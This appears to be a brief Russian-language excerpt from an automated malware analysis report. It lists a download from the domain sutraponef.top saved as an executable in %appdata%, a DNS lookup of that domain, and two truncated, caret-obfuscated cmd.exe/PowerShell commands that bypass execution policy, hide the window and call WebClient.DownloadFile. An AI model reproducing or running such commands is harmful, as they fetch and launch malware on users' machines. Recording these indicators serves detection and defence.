Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^er^S^h^el^L^.EXE ^-Exec^uTIoN^PoLicy ^b^yP^asS^ -N^o^p^ROfiL^e -w^InDow^S^tYle^ H^iD^de^N^ (^NEw^-O^BJEC^T s^ySte^m.Ne^t.W^E^Bc^lIent)^.doWNlO^AD^F^ILE('http://sutrapo...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOw^er^S^h^el^L^.EXE ^-Exec^uTIoN^PoLicy ^b^yP^asS^ -N^o^p^ROfiL^e -w^InDow^S^tYle^ H^iD^de^N^ (^NEw^-O^BJEC^T s^ySte^m.Ne^t.W^E^Bc^lIent)^.doWNlO^AD^F^ILE('http://sutrapo...' (со скрытым окном)